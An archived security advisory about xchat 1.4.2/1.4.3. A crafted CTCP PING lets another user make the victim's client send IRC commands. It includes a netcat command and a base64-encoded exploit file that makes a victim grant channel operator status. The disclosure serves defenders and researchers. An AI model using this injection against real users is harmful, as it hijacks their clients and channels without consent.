Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: unix4984.htm

xchat IRC clients can be tricked by attacker to send commands to server



10th Jan 2002 [SBWID-4984]
COMMAND

	xchat IRC clients can be tricked by attacker to send commands to server

SYSTEMS AFFECTED

	xchat 1.4.2 and 1.4.3

PROBLEM

	zen-parse posted :
	

	The CTCP PING reply handler is designed to return the  string  that  was
	sent to it by another client. This enables that client to determine  the
	time lag between them and another user.
	

	The querying client types

	  /ping nick

	which sends a command of the form:

	  PRIVMSG nick :\\x01PING 1027050764\\x01\\n

	

	Where \"1027050764\" was some representation of the  current  time,  and
	\\x01
	is the character with the ASCII value 0x01. The queried client would respond with:  NOTICE nick :\\xPING 1027050764\\x01\\n 

	and the querying client would then compare the  current  time  with  the
	time in the string.
	

	If you sent \"test 1 2 3 4\" as the time part, xchat  would  reply  with
	the same string. The xchat  client  also  has  a  feature  which  allows
	insertion of arbitrary ascii  valued  characters  into  a  message.  The
	message \"This is %065 test.\" gets sent as \"This is A test.\"  to  the
	server. (This option is disabled by default in later versions.)
	

	If these  expressions  are  expanded  on  the  sending  client,  a  ping
	messsage could be sent to a user with the command:
	

	  /msg nick %001PING 12345678%001 

	

	which would send a string like:
	

	  PRIVMSG nick :\\x01PING 12345678\\x01

	

	(To disable expansion in xchat when you are typing them,  use  \'%%nnn\'
	to send the \'%nnn\' literal. Eg: to send \'%100x\', type \'%%100x\'  in
	the client. If your client does expansion, it would show up  as  \'dx\',
	which can be quite annoying when discussing format strings.)
	

	The PING reply handler also expands the %nnn values in  replies  in  the
	vulnerable   clients.    Example    exploit,    By    Marcus    Meissner
	<Marcus.Meissner@caldera.de>
	

	 

	#fupp is a channel.

	Victim is on it and has channel op status.

	Enter the command: cat xchat.exploit - | netcat server 6667 

	(The - is necessary so we do not quit instantely)

	This causes vulnerable \'Victim\' to give user \'exploit\' channel operator

	status in channel \'#fupp\' on server \'server\'.

	

	

	 

	---1463783680-382694448-1010569513=:26663

	Content-Type: TEXT/PLAIN; charset=US-ASCII; name=\"xchat.exploit\"

	Content-Transfer-Encoding: BASE64

	Content-ID: <Pine.LNX.4.33.0201092245130.26663@clarity.local>

	Content-Description: 

	Content-Disposition: attachment; filename=\"xchat.exploit\"

	

	dXNlciBleHBsb2l0IGZvbyBiYXI6IEV4cGxvaXQgVGVzdGVyDQpuaWNrIEV4

	cGxvaXQNCmpvaW4gI2Z1cHANCnByaXZtc2cgVmljdGltIDoBUElORyAxJTAx

	ME1PREUgI2Z1cHAgK28gRXhwbG9pdCUwMTABDQoNCg==

	---1463783680-382694448-1010569513=:26663--

	

SOLUTION

	Update soon to be available


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH